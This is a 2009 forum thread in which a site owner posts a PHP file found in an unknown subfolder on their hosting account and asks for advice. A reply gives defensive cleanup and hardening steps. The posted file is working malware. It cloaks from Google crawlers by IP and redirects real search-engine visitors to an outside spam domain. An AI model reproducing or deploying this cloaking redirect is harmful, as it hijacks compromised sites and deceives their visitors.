Someone uploaded subfolder to my hosting account

Discussion in 'Security' started by arrisweb, Nov 29, 2009.

0
  1. #1
    Hello all,

    Today I noticed a strange subfolder "zxqec" on my hosting account containing php and txt files. Txt files have lists of php files.

    Php file looks like:

     
<?php
$ips = array("209.185.108", "209.185.253", "209.85.238", "209.85.238.11", "209.85.238.4", "216.239.33.96", "216.239.33.97", "216.239.33.98", "216.239.33.99", "216.239.37.98", "216.239.37.99", "216.239.39.98", "216.239.39.99", "216.239.41.96", "216.239.41.97", "216.239.41.98", "216.239.41.99", "216.239.45.4", "216.239.46", "216.239.51.96", "216.239.51.97", "216.239.51.98", "216.239.51.99", "216.239.53.98", "216.239.53.99", "216.239.57.96", "216.239.57.97", "216.239.57.98", "216.239.57.99", "216.239.59.98", "216.239.59.99", "216.33.229.163", "64.233.173.193", "64.233.173.194", "64.233.173.195", "64.233.173.196", "64.233.173.197", "64.233.173.198", "64.233.173.199", "64.233.173.200", "64.233.173.201", "64.233.173.202", "64.233.173.203", "64.233.173.204", "64.233.173.205", "64.233.173.206", "64.233.173.207", "64.233.173.208", "64.233.173.209", "64.233.173.210", "64.233.173.211", "64.233.173.212", "64.233.173.213", "64.233.173.214", "64.233.173.215", "64.233.173.216", "64.233.173.217", "64.233.173.218", "64.233.173.219", "64.233.173.220", "64.233.173.221", "64.233.173.222", "64.233.173.223", "64.233.173.224", "64.233.173.225", "64.233.173.226", "64.233.173.227", "64.233.173.228", "64.233.173.229", "64.233.173.230", "64.233.173.231", "64.233.173.232", "64.233.173.233", "64.233.173.234", "64.233.173.235", "64.233.173.236", "64.233.173.237", "64.233.173.238", "64.233.173.239", "64.233.173.240", "64.233.173.241", "64.233.173.242", "64.233.173.243", "64.233.173.244", "64.233.173.245", "64.233.173.246", "64.233.173.247", "64.233.173.248", "64.233.173.249", "64.233.173.250", "64.233.173.251", "64.233.173.252", "64.233.173.253", "64.233.173.254", "64.233.173.255", "64.68.80", "64.68.81", "64.68.82", "64.68.83", "64.68.84", "64.68.85", "64.68.86", "64.68.87", "64.68.88", "64.68.89", "64.68.90.1", "64.68.90.10", "64.68.90.11", "64.68.90.12", "64.68.90.129", "64.68.90.13", "64.68.90.130", "64.68.90.131", "64.68.90.132", "64.68.90.133", "64.68.90.134", "64.68.90.135", "64.68.90.136", "64.68.90.137", "64.68.90.138", "64.68.90.139", "64.68.90.14", "64.68.90.140", "64.68.90.141", "64.68.90.142", "64.68.90.143", "64.68.90.144", "64.68.90.145", "64.68.90.146", "64.68.90.147", "64.68.90.148", "64.68.90.149", "64.68.90.15", "64.68.90.150", "64.68.90.151", "64.68.90.152", "64.68.90.153", "64.68.90.154", "64.68.90.155", "64.68.90.156", "64.68.90.157", "64.68.90.158", "64.68.90.159", "64.68.90.16", "64.68.90.160", "64.68.90.161", "64.68.90.162", "64.68.90.163", "64.68.90.164", "64.68.90.165", "64.68.90.166", "64.68.90.167", "64.68.90.168", "64.68.90.169", "64.68.90.17", "64.68.90.170", "64.68.90.171", "64.68.90.172", "64.68.90.173", "64.68.90.174", "64.68.90.175", "64.68.90.176", "64.68.90.177", "64.68.90.178", "64.68.90.179", "64.68.90.18", "64.68.90.180", "64.68.90.181", "64.68.90.182", "64.68.90.183", "64.68.90.184", "64.68.90.185", "64.68.90.186", "64.68.90.187", "64.68.90.188", "64.68.90.189", "64.68.90.19", "64.68.90.190", "64.68.90.191", "64.68.90.192", "64.68.90.193", "64.68.90.194", "64.68.90.195", "64.68.90.196", "64.68.90.197", "64.68.90.198", "64.68.90.199", "64.68.90.2", "64.68.90.20", "64.68.90.200", "64.68.90.201", "64.68.90.202", "64.68.90.203", "64.68.90.204", "64.68.90.205", "64.68.90.206", "64.68.90.207", "64.68.90.208", "64.68.90.21", "64.68.90.22", "64.68.90.23", "64.68.90.24", "64.68.90.25", "64.68.90.26", "64.68.90.27", "64.68.90.28", "64.68.90.29", "64.68.90.3", "64.68.90.30", "64.68.90.31", "64.68.90.32", "64.68.90.33", "64.68.90.34", "64.68.90.35", "64.68.90.36", "64.68.90.37", "64.68.90.38", "64.68.90.39", "64.68.90.4", "64.68.90.40", "64.68.90.41", "64.68.90.42", "64.68.90.43", "64.68.90.44", "64.68.90.45", "64.68.90.46", "64.68.90.47", "64.68.90.48", "64.68.90.49", "64.68.90.5", "64.68.90.50", "64.68.90.51", "64.68.90.52", "64.68.90.53", "64.68.90.54", "64.68.90.55", "64.68.90.56", "64.68.90.57", "64.68.90.58", "64.68.90.59", "64.68.90.6", "64.68.90.60", "64.68.90.61", "64.68.90.62", "64.68.90.63", "64.68.90.64", "64.68.90.65", "64.68.90.66", "64.68.90.67", "64.68.90.68", "64.68.90.69", "64.68.90.7", "64.68.90.70", "64.68.90.71", "64.68.90.72", "64.68.90.73", "64.68.90.74", "64.68.90.75", "64.68.90.76", "64.68.90.77", "64.68.90.78", "64.68.90.79", "64.68.90.8", "64.68.90.80", "64.68.90.9", "64.68.91", "64.68.92", "66.249.64", "66.249.65", "66.249.66", "66.249.67", "66.249.68", "66.249.69", "66.249.70", "66.249.71", "66.249.72", "66.249.73", "66.249.78", "66.249.79", "72.14.199", "8.6.48", "72.14.192", "72.14.193", "72.14.194", "72.14.195", "72.14.196", "72.14.197", "72.14.198", "72.14.199", "72.14.200", "72.14.201", "72.14.202", "72.14.203", "72.14.204", "72.14.205", "72.14.206", "72.14.207", "72.14.208", "72.14.209", "72.14.210", "72.14.211", "72.14.212", "72.14.213", "72.14.214", "72.14.215", "72.14.216", "72.14.217", "72.14.218", "72.14.219", "72.14.220", "72.14.221", "72.14.222", "72.14.223", "72.14.224", "72.14.225", "72.14.226", "72.14.227", "72.14.228", "72.14.229", "72.14.230", "72.14.231", "72.14.232", "72.14.233", "72.14.234", "72.14.235", "72.14.236", "72.14.237", "72.14.238", "72.14.239", "72.14.240", "72.14.241", "72.14.242", "72.14.243", "72.14.244", "72.14.245", "72.14.246", "72.14.247", "72.14.248", "72.14.249", "72.14.250", "72.14.251", "72.14.252", "72.14.253", "72.14.254", "72.14.255", "74.125.0", "74.125.1", "74.125.2", "74.125.3", "74.125.4", "74.125.5", "74.125.6", "74.125.7", "74.125.8", "74.125.9", "74.125.10", "74.125.11", "74.125.12", "74.125.13", "74.125.14", "74.125.15", "74.125.16", "74.125.17", "74.125.18", "74.125.19", "74.125.20", "74.125.21", "74.125.22", "74.125.23", "74.125.24", "74.125.25", "74.125.26", "74.125.27", "74.125.28", "74.125.29", "74.125.30", "74.125.31", "74.125.32", "74.125.33", "74.125.34", "74.125.35", "74.125.36", "74.125.37", "74.125.38", "74.125.39", "74.125.40", "74.125.41", "74.125.42", "74.125.43", "74.125.44", "74.125.45", "74.125.46", "74.125.47", "74.125.48", "74.125.49", "74.125.50", "74.125.51", "74.125.52", "74.125.53", "74.125.54", "74.125.55", "74.125.56", "74.125.57", "74.125.58", "74.125.59", "74.125.60", "74.125.61", "74.125.62", "74.125.63", "74.125.64", "74.125.65", "74.125.66", "74.125.67", "74.125.68", "74.125.69", "74.125.70", "74.125.71", "74.125.72", "74.125.73", "74.125.74", "74.125.75", "74.125.76", "74.125.77", "74.125.78", "74.125.79", "74.125.80", "74.125.81", "74.125.82", "74.125.83", "74.125.84", "74.125.85", "74.125.86", "74.125.87", "74.125.88", "74.125.89", "74.125.90", "74.125.91", "74.125.92", "74.125.93", "74.125.94", "74.125.95", "74.125.96", "74.125.97", "74.125.98", "74.125.99", "74.125.100", "74.125.101", "74.125.102", "74.125.103", "74.125.104", "74.125.105", "74.125.106", "74.125.107", "74.125.108", "74.125.109", "74.125.110", "74.125.111", "74.125.112", "74.125.113", "74.125.114", "74.125.115", "74.125.116", "74.125.117", "74.125.118", "74.125.119", "74.125.120", "74.125.121", "74.125.122", "74.125.123", "74.125.124", "74.125.125", "74.125.126", "74.125.127", "74.125.128", "74.125.129", "74.125.130", "74.125.131", "74.125.132", "74.125.133", "74.125.134", "74.125.135", "74.125.136", "74.125.137", "74.125.138", "74.125.139", "74.125.140", "74.125.141", "74.125.142", "74.125.143", "74.125.144", "74.125.145", "74.125.146", "74.125.147", "74.125.148", "74.125.149", "74.125.150", "74.125.151", "74.125.152", "74.125.153", "74.125.154", "74.125.155", "74.125.156", "74.125.157", "74.125.158", "74.125.159", "74.125.160", "74.125.161", "74.125.162", "74.125.163", "74.125.164", "74.125.165", "74.125.166", "74.125.167", "74.125.168", "74.125.169", "74.125.170", "74.125.171", "74.125.172", "74.125.173", "74.125.174", "74.125.175", "74.125.176", "74.125.177", "74.125.178", "74.125.179", "74.125.180", "74.125.181", "74.125.182", "74.125.183", "74.125.184", "74.125.185", "74.125.186", "74.125.187", "74.125.188", "74.125.189", "74.125.190", "74.125.191", "74.125.192", "74.125.193", "74.125.194", "74.125.195", "74.125.196", "74.125.197", "74.125.198", "74.125.199", "74.125.200", "74.125.201", "74.125.202", "74.125.203", "74.125.204", "74.125.205", "74.125.206", "74.125.207", "74.125.208", "74.125.209", "74.125.210", "74.125.211", "74.125.212", "74.125.213", "74.125.214", "74.125.215", "74.125.216", "74.125.217", "74.125.218", "74.125.219", "74.125.220", "74.125.221", "74.125.222", "74.125.223", "74.125.224", "74.125.225", "74.125.226", "74.125.227", "74.125.228", "74.125.229", "74.125.230", "74.125.231", "74.125.232", "74.125.233", "74.125.234", "74.125.235", "74.125.236", "74.125.237", "74.125.238", "74.125.239", "74.125.240", "74.125.241", "74.125.242", "74.125.243", "74.125.244", "74.125.245", "74.125.246", "74.125.247", "74.125.248", "74.125.249", "74.125.250", "74.125.251", "74.125.252", "74.125.253", "74.125.254", "74.125.255", "64.233.160", "64.233.161", "64.233.162", "64.233.163", "64.233.164", "64.233.165", "64.233.166", "64.233.167", "64.233.168", "64.233.169", "64.233.170", "64.233.171", "64.233.172", "64.233.173", "64.233.174", "64.233.175", "64.233.176", "64.233.177", "64.233.178", "64.233.179", "64.233.180", "64.233.181", "64.233.182", "64.233.183", "64.233.184", "64.233.185", "64.233.186", "64.233.187", "64.233.188", "64.233.189", "64.233.190", "64.233.191", "66.249.64", "66.249.65", "66.249.66", "66.249.67", "66.249.68", "66.249.69", "66.249.70", "66.249.71", "66.249.72", "66.249.73", "66.249.74", "66.249.75", "66.249.76", "66.249.77", "66.249.78", "66.249.79", "66.249.80", "66.249.81", "66.249.82", "66.249.83", "66.249.84", "66.249.85", "66.249.86", "66.249.87", "66.249.88", "66.249.89", "66.249.90", "66.249.91", "66.249.92", "66.249.93", "66.249.94", "66.249.95");
$ths = file_get_contents("1t");
$thisip = $_SERVER["REMOTE_ADDR"];
$isbot = false;
$zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", ".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW");
for ($i=0; $i<count($ips); $i++)
{
 $curip = trim($ips[$i]);
 if (strstr($thisip, $curip))
 {
  $isbot = true;
 
 }
}
 
if (!$isbot)
{
 $htr = $_SERVER["HTTP_REFERER"];
    $flag_g = stristr($htr, "google");
    $flag_y = stristr($htr, "yahoo");
 if (!$flag_g && !$flag_y)
 {
  $isbot = true;
 
 }
}
if (!$isbot)
{
 $tmp1 = explode("q=", $htr);
 $tmp2 = explode("&",$tmp1[1]);
 $kw = $tmp2[0];
 
 $flag1 = false;
 
 for ($i=0; $i<count($zones); $i++)
 {
  $zone = trim($zones[$i]);
  if (stristr($kw, $zone))
  {
   $isbot = true;
      break;
  }
 }
 
 
}
if (!$isbot)
{
header("Location: http://deeprightnews.net/in.cgi?17");
}
?>
    HTML:
    hundreds of keywords and links to other php files.


    I deleted that folder and changed password to hosting account.

    Any thoughts?
     
    arrisweb, Nov 29, 2009 IP
  2. hans

    hans Well-Known Member

    Messages:
    2,923
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #2
    1.
    use search function here in forum
    we had plenty of detailed solutions earlier

    2.
    analyze exactly all your old access<_log files to find HOW precisely the hackers entered your site
    it may be any of the installed SW ( forum, etc)
    whatever SW you run - google its name for security
    example ( software easymblog) - google:
    easymoblog security
    do that query for all isntalled SW
    then you see for ALL your installed scripts if any security problems are known.

    after you have FOUND the real hole - secure it ( it may be MUCH more than a simple access password ) and need hundreds of hours to work on - just do it!

    then also change from password to serverkey access and disable pwd
    study all SW you have, make sure you really NEED what you use

    then as addiional security AFTER all site cleaned and secured - install mod_security and/or snort

    google is your best friend - search your logs, search google - learn your site and server
    you'll need it. hackers are daily on each server - often multiple hackers per day per server
     
    hans, Nov 29, 2009 IP